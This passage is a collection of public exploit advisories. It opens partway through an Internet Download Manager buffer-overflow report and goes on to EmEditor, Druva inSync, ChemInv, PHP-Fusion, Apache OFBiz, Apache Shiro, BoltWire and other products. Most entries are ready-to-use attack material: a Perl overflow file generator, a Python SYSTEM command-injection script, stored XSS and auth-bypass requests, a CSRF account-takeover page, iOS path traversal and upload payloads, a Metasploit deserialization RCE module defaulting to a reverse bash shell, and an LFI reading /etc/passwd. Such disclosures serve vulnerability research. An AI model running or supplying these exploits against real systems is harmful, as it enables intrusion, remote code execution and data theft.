*.ef2 file. Local attackers are able to import manipulated *.ef2 files with manipulated referer and source url to overwrite the eip register. The issue occurs because of the insufficient ef2 filetype (context) validation process that does not perform any length restrictions. The security risk of the local stack buffer overflow vulnerabilities in the software are estimated as high with a cvss count of 7.1. Exploitation of the buffer overflow vulnerability requires a low privilege or restricted system user account without user interaction. Successful exploitation of the vulnerability results in overwrite of the active registers to compromise of the computer system or process. Vulnerable Module(s): [+] Search [+] Import/Export (ef2) Proof of Concept (PoC): ======================= 1.1 The stack buffer overflow vulnerability can be exploited by local attackers with system user privileges without user interaction. For security demonstration or to reproduce the local vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the software 2. Click the downloads menu and open the search 3. Inject a large unicode payload inside the search input field and transmit 4. The software crashs with several uncaught exception because of overwritten register (0168D8F0) 5. Successful reproduce of the local buffer overflow vulnerability! --- Debug Logs (0168D8F0) --- 00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141 - 00D6186D |. 56 PUSH ESI ; /Arg1 - 00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ; IDMan.00D617E0 - 00D6189B |> 50 PUSH EAX ; /Arg1 - 00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ; IDMan.00D617E0 - Call stack Address=0168C79C Stack=00DFE0F2 Procedure / arguments=IDMan.00D617E0 Called from=IDMan.00DFE0ED Frame=0168E02C - SEH chain Address SE handler 0168C790 IDMan.00F751E8 0168D8F0 41414141 - EAX 41414141 ECX 01680000 EDX 41414141 EBX 00000001 ESP 0168C76C EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." EDI 00410043 EIP 00D61850 IDMan.00D61850 Executable modules Base=00D60000 Size=00539000 (5476352.) Entry=00F5CB1C IDMan.<ModuleEntryPoint> Name=IDMan File version=6, 37, 11, 2 Path=C:Program Files (x86)Internet Download ManagerIDMan.exe 1.2 The stack buffer overflow vulnerability can be exploited by local attackers with system user privileges without user interaction. For security demonstration or to reproduce the local vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the software 2. Start the bof_poc.pl 3. Open the tasks menu 4. Click import and import *.ef2 poc Note: The software process crashs on import with uncaught exception 5. Successful reproduce of the local buffer overflow vulnerability! Usage Example: Export/Import (*.ef2) < https://www.vulnerability-lab.com/download_content.php?id=1337 referer: https://www.vulnerability-lab.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko > PoC: Exploit #!/usr/bin/perl # Local Stack Buffer Overflow Exploit for Internet Download Manager v6.37.11.1 # Vulnerability Laboratory - Benjamin Kunz Mejri my $poc = "bof_poc.ef2" ; print "[+] Producing bof_poc.ef2 ..." ; my $buff0=" "."<" x 1; my $buff1=" n https://"."A" x 1024; my $buff2=" n Referer:"."A" x 1024; my $buff3=" n User Agent:"."A" x 1024; my $buff4=" n ".">" x 1; open(ef2, ">>$poc") or die "Cannot open $poc"; print ef2 $buff0; print ef2 $buff1; print ef2 $buff2; print ef2 $buff3; print ef2 $buff4; close(ef2); print "n[+] done !"; Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: EmEditor 19.8 - Insecure File Permissions # Date: 2020-04-27 # Exploit Author: SajjadBnd # Vendor Homepage: https://www.emeditor.com/ # Software Link: https://support.emeditor.com/en/downloads/suggested # Version: 19.8 # Tested on: Win10 Professional x64 [ Description ] EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows. Both native 64-bit and 32-bit builds are available, and moreover, the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit), and AVX-512 (512-bit) instruction sets. [ PoC ] C:\Users\user\AppData\Local\Programs\EmEditor λ icacls *.exe ee128.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) ee256.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) ee512.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) EEAdmin.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) eehlpver.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) eeupdate.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) emedhtml.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) EmEditor.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) emedtray.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) emedws.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) Successfully processed 10 files; Failed processing 0 files [ Exploit - Privilege Escalation ] Replace any *.exe files with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) - Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D

# Exploit Title: hits script 1.0 - 'item_name' SQL Injection # Date: 2020-04-27 # Exploit Author: SajjadBnd # Vendor Homepage: https://hits.ir # Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip # Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip # Version: 1.0 # Tested on: Win10 Professional x64 [ description of script ] With this script you can set up a site to exchange statistics and traffic as well as increase rankings. In this script, it is possible to exchange Google +1, exchange Facebook points, exchange Twitter followers, exchange YouTube visitors, exchange visit statistics. [ poc ] file : ipn.php parameters : 'item_name' , 'item_number' method : POST source [ 36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'")); 19: $item_name = $_POST['item_name']; 20: $item_number = $_POST['item_number']; requires: 4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) 31: if(!$fp) else 35: if(strcmp($res, "VERIFIED") == 0) ] parameter : 'custom' method : POST source [ 43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'"); 27: $custom = $_POST['custom']; requires: 4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) 31: if(!$fp) else 35: if(strcmp($res, "VERIFIED") == 0) 41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed')) ] parameters : 'item_name','mc_gross' method : POST source [ 44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())"); 19: $item_name = $_POST['item_name']; 22: $payment_amount = $_POST['mc_gross']; requires: 4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) 31: if(!$fp) else 35: if(strcmp($res, "VERIFIED") == 0) 41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed')) ] file : register.php parameters : 'PlusREF','register' method : COOKIE,POST source [ 22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'"); 21: $ref = $_COOKIE['PlusREF']; requires: 3: if(isset($_POST['register'])) 19: if(!checkpwd ($sec['password'], $sec['password2'])) else 20: if(isset($_COOKIE['PlusREF'])) ] & source [ 40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or 37: $final = visitorip (); 39: $passc = md5($passa); 38: $passa = $sec['password']; 38: $passa = $sec['password']; 21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)), 26: $activare = rand(000000000, 999999909); requires: 3: if(isset($_POST['register'])) 19: if(!checkpwd ($sec['password'], $sec['password2'])) else ]

# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation # Date: 2020-04-28 # Exploit Author: Chris Lyne # Vendor Homepage: druva.com # Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi # Version: 6.5.2 # Tested on: Windows 10 # CVE : CVE-2019-3999 # See also: https://www.tenable.com/security/research/tra-2020-12 import socket import struct import sys # Command injection in inSyncCPHwnet64 RPC service # Runs as nt authority\system. so we have a local privilege escalation if len(sys.argv) < 2: print "Usage: " + __file__ + " <quoted command to execute>" print "E.g. " + __file__ + " \"net user /add tenable\"" sys.exit(0) ip = '127.0.0.1' port = 6064 command_line = sys.argv[1] # command gets passed to CreateProcessW def make_wide(str): new_str = '' for c in str: new_str += c new_str += '\x00' return new_str hello = "inSync PHC RPCW[v0002]" func_num = "\x05\x00\x00\x00" # 05 is to run a command command_line = make_wide(command_line) command_length = struct.pack('<i', len(command_line)) # send each request separately requests = [ hello, func_num, command_length, command_line ] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) i = 1 for req in requests: print 'Sending request' + str(i) sock.send(req) i += 1 sock.close() print "Done."

# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting # Exploit Author: Bobby Cooke # Date: 2020-04-29 # Software Link: https://github.com/tmorrell/cheminv # Software Info: # "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users." # "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University" # "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog." # Version: 1 # Tested On: CentOS # Vulnerability Type: # ChemInv suffers from a persistent cross-site scripting vulnerability(XSS). This vulnerability can be exploited to have all users of the system, with read access to the project, execute malicious client-side code; every time the users views the 'Projects' or 'Add Chemicals' tab. # The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript injections to the SQL database. # Vulnerable Source Code ## proj_list.php 33 include('include/include_proj_add.php'); 34 $AddProj = new ProjAdd; 35 $AddProj->AddProj(); 36 37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner"); ## include/include_proj_add.php 2 class ProjAdd { 3 public function AddProj () { 4 5 require_once('include/login/auth.php'); 6 include('include/mysql_connect.php'); 7 8 if(isset($_POST['submit'])) { 9 $owner = $_SESSION['SESS_MEMBER_ID']; 10 $name = mysql_real_escape_string($_POST['name']); 11 12 if ($name == '') { 13 echo '<div class="message red">'; 14 echo 'You have to specify a name!'; 15 echo '</div>'; 16 } 17 else { 18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')"; 19 $sql_exec = mysql_query($sql); # Malicious POST Request to https://TARGET/proj_list.php POST /proj_list.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/proj_list.php Content-Type: application/x-www-form-urlencoded Content-Length: 16 Connection: close Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85 name=evilProject<script>alert('XSS');</script>&submit=

# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC) # Author: Dolev Farhi # Date: 2020-04-29 # Vulnerable version: 3.0.2 (14) # Link: http://www.sunnysidesoft.com/ # CVE: N/A from thrift import Thrift from thrift.transport import TSocket from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol from pygen.example import Example host = '192.168.1.1' port = 57110 try: transport = TSocket.TSocket(host, port) transport = TTransport.TBufferedTransport(transport) protocol = TBinaryProtocol.TBinaryProtocol(transport) client = Example.Client(protocol) transport.open() client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') transport.close() except Thrift.TException as tx: print(tx.message)

# Exploit Title: Online Scheduling System 1.0 - Persistent Cross-Site Scripting # Exploit Author: Bobby Cooke # Date: 2020-04-30 # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Vulnerability Info: # Online Scheduling System v1.0 suffers from an authenticated persistent cross-site scripting vulnerability. This Proof of Concept (PoC) will cause all users of the system, with read access to the courses, to execute arbitrary client-side code when viewing the 'Home' and 'List' tabs within the web application. The application fails to sanitize arguments supplied by the user before inserting them into the SQL database. # Vulnerable Source Code ## /add.cor.php 14 $Course_Code = $_POST['corcode']; 15 $Course_name = $_POST['corname']; 16 17 $sql = "INSERT INTO course (Course_Code, Course_name) VALUES ('$Course_Code', '$Course_name')"; # Malicious POST Request POST /Online%20Scheduling%20System/add.cor.php HTTP/1.1 Host: 172.16.65.130 Referer: http://172.16.65.130/Online%20Scheduling%20System/addcourse.php Content-Type: application/x-www-form-urlencoded Connection: close Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 corcode=XSS-101&corname=%3Cscript%3Ealert%28%22XSS-101%22%29%3B%3C%2Fscript%3E&submit=

# Exploit Title: php-fusion 9.03.50 - Persistent Cross-Site Scripting # Google Dork: "php-fusion" # Date: 2020-04-30 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30 # Version: 9.03.50 # Tested on: Windows # CVE : CVE-2020-12706 ### Vulnerability : Persistent Cross-Site Scripting ###Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML via the go parameter to /infusions/faq/faq_admin.php, /infusions/shoutbox_panel/shoutbox_admin.php ###To Reproduce Steps to reproduce the behavior: Authenticated user submit Q&A or Shoutbox to admin ### POC: ## Submit Q&A: POST /php-fusion/submit.php?stype=q HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------68756068726681644952075211938 Content-Length: 1146 Origin: http://TARGET DNT: 1 Connection: close Referer: http://TARGET/php-fusion/submit.php?stype=q Cookie: xxx Upgrade-Insecure-Requests: 1 -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="fusion_token" 2-1588232750-f839ed0754d5dc8aa577cfb660e273e711ec03a9a782de90ac34860cdb45a8f1 -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="form_id" submit_form -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="fusion_PR57qY" -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_question" Question XSS -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_answer" xss</textarea><ScRiPt>alert('XSS')</ScRiPt> -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_cat_id" 1 -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_language[]" English -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="submit_link" Submit -----------------------------68756068726681644952075211938-- ## Shoutbox POST /php-fusion/infusions/downloads/downloads.php?cat_id=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 272 Origin: http://TARGET DNT: 1 Connection: close Referer: http://TARGET/php-fusion/infusions/downloads/downloads.php?cat_id=1 Cookie: xxx Upgrade-Insecure-Requests: 1 fusion_token=2-1588233429-3df5ba2b9c690e833548645f66a7772cf7fdb24ca9be130d5ff01e26351a2771&form_id=sbpanel&fusion_gEHiPs=&shout_id=0 &shout_hidden=&shout_message=xss</textarea><ScRiPt>alert('XSS')</ScRiPt>&shout_language=English&shout_box=Save+Shout ###Reference: https://github.com/php-fusion/PHP-Fusion/issues/2306 ### History ============= 2020-04-09 Issue discovered 2020-04-14 Vendor contacted 2020-04-28 Vendor response and hotfix 2020-04-29 Vendor releases fixed

# Title: Super Backup 2.0.5 for iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-30 # Software: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 # CVE: N/A Document Title: =============== Super Backup v2.0.5 iOS - Directory Traversal Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2200 Common Vulnerability Scoring System: ==================================== 7.1 Product & Service Introduction: =============================== Backup all your iPhone or iPad contacts in 1 tap and export them. Fastest way to restore contacts from PC or Mac. Export by mailing the backed up contacts file to yourself. Export contacts file to any other app on your device. Export all contacts directly to your PC / Mac over Wifi, no software needed! Restore any contacts directly from PC / Mac. Restore contacts via mail. Get the ultimate contacts backup app now. (Copy of the Homepage: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) Affected Product(s): ==================== Dropouts Technologies LLP Product: Super Backup v2.0.5 Vulnerability Disclosure Timeline: ================================== 2020-04-30: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A directory traversal web vulnerability has been discovered in the official Super Backup v2.0.5 ios mobile web-application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path. The directory-traversal web vulnerability in the app is located in the `list` and `download` module with the `path` parameter. Attackers are able to change the path variable to request the local list command. By changing the path parameter the validation mechanism runs into a logic error that turns back the possibility to request different pathes outside the basic import/export folder. Thus way the attacker injects for example local path environment varibales to compromise the local ios web-application. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise. Proof of Concept (PoC): ======================= The directory traversal vulnerability can be exploited by attackers with access to the wifi interface in a local network without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Payloads %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 /../../../../../../../../../../../../../../../../../../../../../../%00 //.././%00 PoC: Exploitation http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 --- PoC Session Logs [GET]] --- http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive - GET: HTTP/1.1 200 OK Content-Length: 174 Content-Type: application/json Connection: Close - http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive - GET: HTTP/1.1 200 OK Content-Length: 174 Content-Type: application/json Connection: Close - Opening the url allows to download the list file json with content path output [{"path":"../../../../../../../../../../../../ "size":21961}] References: http://localhost/list?path= http://localhost/download?path= Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: HardDrive 2.1 for iOS - Arbitrary File Upload # Author: Vulnerability Laboratory # Date: 2020-04-30 # Software: https://apps.apple.com/ch/app/harddrive/id383226784 # CVE: N/A Document Title: =============== HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2221 Common Vulnerability Scoring System: ==================================== 7.4 Product & Service Introduction: =============================== Store+Organize+Edit+Protect+Import+Download+View+Share your files right from your iPhone! Transform your iPhone/iPod touch into a real HardDrive with no extra cable or software. (Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 ) Affected Product(s): ==================== Sebastien BUET HardDrive v2.1 - Apple iOS Mobile Web Application Vulnerability Disclosure Timeline: ================================== 2020-04-29: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ An arbitrary file upload web vulnerability has been discovered in the official Air Sender v1.0.2 iOS mobile application. The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service. The arbitrary upload vulnerability is located in the within the web-server configuration when using the upload module. Remote attackers are able to bypass the local web-server configuration by an upload of malicious webshells. Attackers are able to inject own files with malicious `filen` values in the `upload` POST method request to compromise the mobile web-application. The application does not perform checks for multiple file extensions. Thus allows an attacker to upload for example to upload a html.js.png file. After the upload the attacker requests the original url source with the uploaded file and removes the unwanted extension to execute the code in the unprotected web-frontend. The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0. Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] ./upload Vulnerable File(s): [+] file Proof of Concept (PoC): ======================= The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Vulnerable Source (File Dir Listing Index) <tr><td width="100px" valign="middle" align="left"><img src="exploit.html"></td><td width="300px" valign="middle" align="left"> <a href="exploit.html.js">exploit.html.js</a></td> <td width="454px" valign="middle" align="left"> <em valign="middle" align="center">size: 256.7 Kb PoC: Exploitation http://localhost:50071/exploit.html.js --- PoC Session Logs [POST] --- (file) http://localhost:50071/ Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387 Content-Length: 263181 Origin: http://localhost:50071 Connection: keep-alive Referer: http://localhost:50071/ file=exploit.html.js.png&button=Submit POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 381654 - http://localhost:50071/exploit.html.js Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive - http://localhost:50071/exploit.html GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 366735 Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) # Exploit Author: Faiz Ahmed Zaidi # Vendor Homepage: [https://ofbiz.apache.org/security.html] # Software Link: https://ofbiz.apache.org/download.html#security # Version: Before 17.12.03 # Tested on: Linux and Windows # CVE : CVE-2019-0235 #Exploit Code: <html> <body> <form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST"> <input type="hidden" name="contactMechId" value="admin" /> <input type="hidden" name="contactMechTypeId" value="EMAIL&#95;ADDRESS" /> <input type="hidden" name="partyId" value="admin" /> <input type="hidden" name="DONE&#95;PAGE" value="viewprofile&#63;party&#95;id&#61;adminâ&#136;&#130;yId&#61;admin" /> <input type="hidden" name="emailAddress" value="[email protected]" /> <input type="hidden" name="allowSolicitation" value="Y" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> After that do a password reset via forget password. It's done :)

# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass # Exploit Author: Bobby Cooke # Date: 2020-04-30 # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1 POST /Online%20Scheduling%20System/login.php HTTP/1.1 Host: TARGET Connection: close Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 username=0&password=0&lgn=Login

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Shiro v1.2.4. }, 'License' => MSF_LICENSE, 'Author' => [ 'L / l-codes[at]qq.com' # Metasploit module ], 'References' => [ ['CVE', '2016-4437'], ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1'] ], 'Platform' => %w{ win unix }, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Unix Command payload', 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} ], [ 'Windows Command payload', 'Arch' => ARCH_CMD, 'Platform' => 'win' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 7 2016', 'Privileged' => false, 'DefaultOptions' => { 'WfsDelay' => 5 } ) ) register_options( [ OptString.new('TARGETURI', [ true, 'Base directory path', '/']) ]) end def aes_encrypt(payload) aes = OpenSSL::Cipher.new('aes-128-cbc') aes.encrypt aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==') aes.random_iv + aes.update(payload) + aes.final end def exploit cmd = payload.encoded vprint_status("Execute CMD: #{cmd}") type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' ) java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) ciphertext = aes_encrypt(java_payload) base64_ciphertext = Rex::Text.encode_base64(ciphertext) send_request_cgi({ 'uri' => target_uri.path, 'method' => 'GET', 'cookie' => "rememberMe=#{base64_ciphertext}" }) end end

# Exploit Title: BoltWire 6.03 - Local File Inclusion # Date: 2020-05-02 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://www.boltwire.com/ # Software Link: https://www.boltwire.com/downloads/go&v=6&r=03 # Version: 6.03 # Tested on: Ubuntu 20.04 LAMP LFI: Steps to Reproduce: 1) Using HTTP GET request browse to the following page, whilst being authenticated user. http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd Result root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin [SNIPPED]